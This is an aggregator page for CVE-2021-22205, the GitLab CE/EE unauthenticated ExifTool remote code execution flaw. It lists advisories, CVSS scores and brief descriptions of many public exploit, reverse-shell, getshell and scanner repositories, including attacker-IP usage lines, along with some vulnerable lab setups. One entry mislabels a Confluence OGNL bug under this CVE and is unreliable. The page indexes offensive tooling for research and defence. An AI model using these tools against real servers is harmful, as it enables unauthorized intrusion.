CVE-2021-22205

Published: 23/04/2021 Updated: 12/07/2022
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 10 | Impact Score: 6 | Exploitability Score: 3.9
CVSS v2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.

Vulnerable Product

Vendor: gitlab / Product: gitlab

Vendor Advisories

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser, which resulted in a remote command execution. The issue is fixed in GitLab versions 13.10.3, 13.9.6 and 13.8.8 ...

Arch Linux Security Advisory ASA-202104-1
Severity: Critical
Date: 2021-04-29
CVE-ID: CVE-2021-22205 CVE-2021-28965
Package: gitlab
Type: multiple issues
Remote: Yes
Link: security.archlinux.org/AVG-1822
Summary: The package gitlab before version 13.10.3-1 is vulnerable to ...

Mailing Lists

GitLab version 13.10.2 remote code execution exploit that provides a reverse shell ...
This Metasploit module exploits an unauthenticated file upload and command injection vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE). The patched versions are 13.10.3, 13.9.6, and 13.8.8. Exploitation will result in command execution as the git user ...

GitHub Repositories

CVE-2021-22205: GitLab CE/EE Preauth RCE using ExifTool. This project is for learning only; if someone's rights have been violated, please contact me to remove the project, and lastly, DO NOT USE IT ILLEGALLY. If you engage in any illegal behavior in the process of using this tool, you will bear all the consequences yourself. All developers and all contributors of this tool do no

cve-2021-22205-hash-generator: Finds an identifiable hash value for each version of GitLab vulnerable to CVE-2021-22205 (gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json). Running The Tool. Prerequisites: This tool requires that docker be installed along with docker-compose on the machine executing the binary. It also requires connection to a mongodb inst

THUCTF 2022 Writeup: I entered this contest as a one-person team and treated it as an "on-site learning ability contest"; by learning from all over the internet I solved 23 challenges in total, for a score of 7618. Below I briefly give my approach to each challenge, grouped by category; the appendix collects all scripts and code used, as well as some attempts that proved unsuccessful during the contest. The code in this article was generated with Org-mode and can be

    import requests
    import json
    import time

    name = "repositories/gitlab/gitlab-ce"

    def query_gitlabce_tags():
        all_tags = []
        query_tag_url = "https://hub.docker.com/v2/repositories/gitlab/gitlab-ce/tags/?page_size=100&page=1"
        while query_tag_url:
            resp = requests.get(query_tag_url)
            resp_json = json.loads(resp.text)
            tag_results = [i["

GitLab-preauth-RCE_CVE-2021-22205: single-line bash PoC for GitLab preauth RCE (CVE-2021-22205).

Background: Security is an exercise in managing risk. Reviewing the common root causes of security incidents is an effective way to guide prioritized remediation efforts. This repository seeks to index all publicly disclosed AWS customer security incidents with a known root cause. It will exclude incidents involving exposed data stores (e.g. S3 bucket leaks, exposed managed or ho

CVE-2021-22205: This is the deployment for Gitlab Enterprise Edition (13.9.5) that is vulnerable to CVE-2021-22205, using a Docker container. Description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser, which resulted in a remote command execution. Requirement:

CVE-2021-22205 Playground: This is a small Docker recipe for setting up an instance of Gitlab Enterprise Edition (13.9.5) that is vulnerable to CVE-2021-22205. Minimum Requirement: CPU: 4 cores, RAM: 8GB, HDD: 30GB. Usage: $ docker-compose up -d --build. P.S.: you need to wait around 15-20 minutes for the container to finish starting up, depending on your setup.

Gitlab version index: The version-number index is split mainly into gitlab-ee (931 versions) and gitlab-ce (934 versions). Tags can be crawled from the v2 API, about 10 pages: hub.docker.com/v2/repositories/gitlab/gitlab-ee/tags/?page_size=100&page=1 hub.docker.com/v2/repositories/gitlab/gitlab-ce/tags/?page_size=100&page=1 0x01 Analysis ╭─root@u

CVE-2021-22205-getshell CVE-2021-22205-getshell

CVE-2021-22205 CVE-2021-22205 RCE

Automated-Gitlab-RCE: Automated Gitlab RCE via CVE-2021-22205. example.py GitlabURL AttackerIP. Added shell via python socket and pre-loaded commands to pop an RCE. Main payload used from github.com/Al1ex/CVE-2021-22205

CVE-2021-22205 CVE-2021-22205 Exploitation of unauthenticated upload

CVE-2021-22205: a fork based on mr-r3bot/Gitlab-CVE-2021-22205. Introduction: CVE-2021-22205, Gitlab unauthenticated remote code execution vulnerability EXP. Removed the dependency on djvumake & djvulibre; the payload is generated internally, so it can run on the Windows platform. Usage: # authentication required python3 exploit.py -u <username> -p <password> -t <gitlab_url> -c <

CVE-2021-22205

Polaris: Project introduction: an all-in-one penetration testing framework combining information gathering, vulnerability exploitation, vulnerability brute-forcing and other functions. Usage help: edit the configuration file conf/setting.toml; it holds the parameters the program needs to run as well as the plugin parameters, change them as needed. Install supporting libraries: pip3 install -r requirements.txt -i pypidouba

Xiaoli-Tools: Some scripts which I think are useful. Table of content: Overview; wmi-PS (wmi password spraying); gitlab-RCE (CVE-2021-22205)

CVE-2021-22205 CVE-2021-22205 Exploit

GitLab-CVE-2021-22205-scanner: Usage: $~ python3 GitLab-revshell.py -u gitlab.target.com -l [AttackerIP] -p [AttackerPort]. Credit: hackerone.com/reports/1154542. Referred code snippet from here: github.com/CsEnox/Gitlab-Exiftool-RCE/blob/main/exploit.py. Disclaimer: The script is for security analysis and research onl

POC-bomber: POC bomber is a vulnerability detection tool that aims to use a large number of POCs to quickly find weaknesses in a target, saving the time spent on manual vulnerability checking. The project collects publicly known high-impact vulnerability POCs and integrates them into the POC bomber arsenal, using them to fuzz-test one or many targets and thereby quickly gain access to the target server; suited to red/blue exercises or to red teams in HVV quickly finding a breakth

HS-CTF-22: Helt Sikker CTF 2022 Challenges. Web: Vaccine - SQLi; Girl Scouts - Cookie modification; Bradley Urglar's API - Insecure direct object reference (from NAV IT); Repo - CVE-2021-22205 gitlab RCE; Protectr - robots.txt; Inspector Gadget - Flag in page source. Crypto: Long lost message - Playfair cipher; Hexadecimal - Hex to ASCII; Exclusive Or - XOR with known key; Mario 64

cve-hash-generator: Finds an identifiable hash value for each version of GitLab vulnerable to a specific CVE by the defined semantic version range. Example: gitlab.com/gitlab-org/cves/-/blob/9e9a08f61709c8016039468c90e1880715d173e7/2021/CVE-2021-22205.json#L19-29. Running The Tool. Prerequisites: This tool requires that docker be installed along with docker-compose on the

CVE-2021-22205 Pocsuite3 For CVE-2021-22205

CVE-2021-22205 Gitlab RCE: unauthenticated remote code execution vulnerability

Gitlab-CVE-2021-22205: multi-threaded batch detection script for CVE-2021-22205. Uses dnslog, which can be combined with the PoC for detection; detection runs in multiple threads; the executed command can be customized.

CVE-2021-22205 a report for Internet and system security class

CVE-2021-22205: Because Gitlab did not correctly validate image files passed to the file parser, command execution results. An attacker can craft a malicious request that exploits this vulnerability to execute arbitrary commands on the target system, ultimately taking control of the Gitlab server. Since most scripts online lack a reverse shell, the script found online was modified to add a one-click getshell feature. Affected versions: 11.9 <= GitLab (CE/EE)

CVE-2021-22205

Vuln Impact: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser, which resulted in a remote command execution. Affected Version: Gitlab CE/EE < 13.10.3, Gitlab CE/EE < 13.9.6, Gitlab CE/EE < 13.8.8. Vuln Impact: Soon. Reference: githubc

THUCTF Write-Up by 4E1A607A. Mobile checkin: get onto Discord through a proxy; the flag is in the announcements channel. test your nc: connect with nc. survey: fill out the questionnaire, then base64-decode. Misc: "What bad intentions could little Klee have?": 3 images; opening them in an image viewer (no alpha channel) lets you identify 3 groups, stegsolve (possibly with an alpha channel) identifies another two groups, and for the last group, drop it into Word and adjust the brightness. flagmarket_level1

Vuln Impact: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser, which resulted in a remote command execution. Vuln Product: Gitlab CE/EE < 13.10.3, Gitlab CE/EE < 13.9.6, Gitlab CE/EE < 13.8.8. Environment: export GITLAB_HOME=/srv/gitlab sudo d

Golang-CVE-2021-22205-POC: A CVE-2021-22205 Gitlab RCE POC written in Golang. I've been wanting to learn Golang for a while, so I decided to write a POC for CVE-2021-22205 in Golang to help familiarize myself with the language. Please disregard what I am assuming is horribly written code. Usage: go run CVE-2021-22205.go -t 127.0.0.1:8080 -c "echo pizza > /tmp

pocGoby2Xray: Converts Goby's JSON-format PoCs into xray's YAML-format PoCs. Goby and Xray are community/commercial penetration testing tools popular with security enthusiasts (including the author); the Nemo project also integrates calling Xray for PoC scanning. The original intent of pocGoby2Xray is to "translate" the PoC rules and syntax of the two tools and then "convert" them, making it convenient to use Xray uniformly for invoking PoC

CVE-2021-22205: A remote attacker, without authentication, can construct an OGNL expression for injection and execute arbitrary code on Confluence Server or Data Center; the PoC was modified to make getshell convenient. Affected versions: Confluence Server and Data Center >= 1.3.0, Confluence Server and Data Center < 7.4.17, Confluence Server and Data Center < 7.13.7, Confluence Server and

English | Simplified Chinese. ObserverWard_0x727. Category / Description. Author: 三米前有蕉皮. Team: 0x727, which will open-source more tools over the coming period. Positioning: community fingerprint-database recognition tool. Language: Rust. Features: command-line and API-service web fingerprinting tool. 1. Manual installation from source: git clone github.com/0x727/ObserverWard_0x727 cd ObserverWard_0x727 cargo build --target x86_

VcenterKiller: An all-in-one exploitation tool targeting vCenter, covering the currently most common CVE-2021-21972, CVE-2021-21985 and CVE-2021-22205; provides one-click webshell upload, command execution, or uploading a public key to connect via SSH.

FrameVul: General: 钉钉 (DingTalk), 泛微OA (Weaver OA), 致远OA (Seeyon OA), Apache APISIX, Apache Druid, Apache Kylin, Coremail, Discuz, Exchange, FastJson, Fckeditor, Flask, Gitlab, Jboss, Jenkins, Log4j, MeterSphere, Oracle Access Manager, Outlook, Shiro, Spring, Struts2, Thinkphp, TP-Link, Vmware, Weblogic, Zabbix. General: a collection of offensive vulnerabilities in mainstream vendors' products; 2021 HVV vulnerabilities; 2022 CVEs in Java applications

Awesome-Exploit: [Disclaimer] The techniques, ideas and tools in this repository are for learning only; no one may use them for illegal purposes or for profit, otherwise they bear the consequences themselves. An exploit tool repository, updated irregularly. For details of the corresponding vulnerabilities see: Threekiii/Awesome-POC, Threekii/Vulhub-wiki. Celery: Airflow Celery message broker command execution CVE-2020-11981 Celery <

The latest library consists of PeiQi library documents from after 202107, previously unrecorded documents, and commonly used documents. View the historical library - PeiQi. 20220106 update: JBoss. 20220105 update: log4j remote code execution, Gitlab-CVE-2021-22205, Grafana-CVE-2021-43798, Atlassian_Confluence remote code execution vulnerability (CVE-2021-26084), Zabbix, Apache_Struts, Spring_Boot. Quick reference: fastjson, determining via Dnslog whether fastj

pocsuite3 (268 files), updated 2022-12-03 05:07:10. Update log (file name, date added): CVE-2021-21975.py 2022-12-03 05:07:10; CVE-2021-46422.py 2022-12-03 05:07:10; D-Link.py 2022-12-03 05:07:10; hikvision-2013-4976_web_login-bypass.py 2022-12-03 05:07:10; lanhai.py 2022-12-03 05:07:10; CVE-2022-26134.py 2022-12-03 05:07:10; rce_佑友防火墙.py 2022-12-03 05:07

vulwiki: descriptions/exploitation/fixes for vulnerabilities in popular frameworks/components/services. Framework/component | Vulnerability | Researched: apache solr: Apache Solr Velocity template injection (CVE-2019-17558), Apache Solr remote command execution (CVE-2017-12629), Solr unauthorized access, Apache Solr remote command execution vulnerability (CVE-2019-0193), Solr arbitrary file read vulnerability (CVE-2021-27905); fastjson: fastjson 1.2.24 √

Vulnerability Index. Program List: open-source products and foreign application software. Application List: domestic (Chinese) application software. Program List: Apache APISIX, Apache Druid, Apache Flink, Apache HTTP Server, Apache JSPWiki, Apache OFBiz, Apache ShenYu, Apache SkyWalking, Apache Solr, Apache Storm, Apache Struts2, Atlassian Confluence, Atlassian Crowd, Atlassian Jira, Citrix, Cisco, ECShop, Exchange, F5 BIG-IP, Gitlab, Grafana, Harbo

Vulhub-Reproduce: [Disclaimer] The techniques, ideas and tools in this repository are for security research only; no one may use them for unauthorized penetration testing, for illegal purposes or for profit, otherwise they bear the consequences themselves. Vulhub vulnerability reproduction, updated from time to time. Thanks to @Vulhub for providing the open-source vulnerability lab. 0x01 Project navigation: Adobe ColdFusion deserialization vulnerability CVE-2017-3066 Ado

goby poc (926 in total), last checked 2022-12-03 10:14:29. Collection log (file name, date added): H3C-IMC-dynamiccontent.properties.xhtm-RCE.json 2022-12-03 10:13:52; Oracle-Weblogic-Server-Deserialization-RCE(CVE-2018-2628).json 2022-12-03 10:13:52; tongda-OA-file-include-getshell.json 2022-12-03 10:13:52; H3C-Next-generation-firewall-File-read.json 2022-12-03

Penetration_Testing_POC: A collection of POCs, scripts, tools, articles and other techniques used in penetration testing, kept as notes; additions welcome. Penetration_Testing_POC: Please make good use of search [Ctrl+F]. IOT Device & Mobile Phone; Web APP; privilege escalation helpers; PC tools - small tool collection; articles/books/tutorials. Notes: Please make good use of search [Ctrl+F]. IOT Device & Mobile

Penetration_Testing_POC: A collection of POCs, scripts, tools, articles and other techniques used in penetration testing, kept as notes; additions welcome. Please check every tool for backdoors or other abnormal behavior; it is recommended to run everything in a virtual environment. Penetration_Testing_POC: Please make good use of search [Ctrl+F]. IOT Device & Mobile Phone; Web APP; privilege escalation helpers; PC tools - small tool collection

TOP: all Top; Top_Codeql; TOP All bugbounty pentesting CVE-2022- POC Exp Things. Table of Contents: 2022 year top total 30; 2021 year top total 30; 2020 year top total 30; 2019 year top total 30; 2018 year top total 30; 2017 year top total 30; 2016 year top total 30; 2015 year top total 30; 2014 year top total 30; 2013 year top total 30. 2022 (star | name | url | des): 988 | CVE-2022-0847-

Table of Contents: 2023 year top total 30; 2022 year top total 30; 2021 year top total 30; 2020 year top total 30; 2019 year top total 30; 2018 year top total 30; 2017 year top total 30; 2016 year top total 30; 2015 year top total 30; 2014 year top total 30. 2023 (star | updated_at | name | url | des): 304 | 2023-03-18T21:10:14Z | Windows_LPE_AFD_CVE-2023-21768 | github.com/chompie1337/Wi

Table of Contents: 2023 year top total 30; 2022 year top total 30; 2021 year top total 30; 2020 year top total 30; 2019 year top total 30; 2018 year top total 30; 2017 year top total 30; 2016 year top total 30; 2015 year top total 30; 2014 year top total 30. 2023 (star | updated_at | name | url | des): 323 | 2023-03-23T01:27:35Z | Windows_LPE_AFD_CVE-2023-21768 | github.com/chompie1337/Wi

PoC in GitHub 2022: CVE-2022-0185 (2022-02-11): A heap-based buffer overflow flaw was found in the way the legacy_parse_param function in the Filesystem Context functionality of the Linux kernel verified the supplied parameter's length. An unprivileged (in case unprivileged user namespaces are enabled, otherwise needs namespaced CAP_SYS_ADMIN privilege) local user able to open a f

SecBooks: A collection of articles from major document libraries and WeChat official accounts; some libraries are deployed with gitbook, while some official accounts mostly publish scattered articles. Plugins used: "hide-element", "back-to-top-button", "-lunr", "-search", "search-pro", "splitter". # automatic table-of-contents generation plugin (book sm) npm install -g gitbook-summ

Table of Contents: 2023 year top total 30; 2022 year top total 30; 2021 year top total 30; 2020 year top total 30; 2019 year top total 30; 2018 year top total 30; 2017 year top total 30; 2016 year top total 30; 2015 year top total 30; 2014 year top total 30; 2013 year top total 30; 2012 year top total 30; 2011 year top total 30; 2010 year top total 30; 2009 year top total 30; 2008 year top to

PoC in GitHub 2021: CVE-2021-1056 (2021-01-07): NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidia.ko) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure. pokerfaceSad/CVE-2021-1056 CVE-2021-

Recent Articles

DDoS attacks in Q4 2021
Securelist • Alexander Gutnikov • 10 Feb 2022

News roundup
Q4 2021 saw the appearance of several new DDoS botnets. A zombie network, named Abcbot by researchers, first hit the radar in July, but at the time it was little more than a simple scanner attacking Linux systems by brute-forcing weak passwords and exploiting known vulnerabilities. In October, the botnet was upgraded with DDoS functionality. Then in December, researchers at Cado Security linked the botnet to the Xanthe cryptojacking group. This is further evidence that the sam...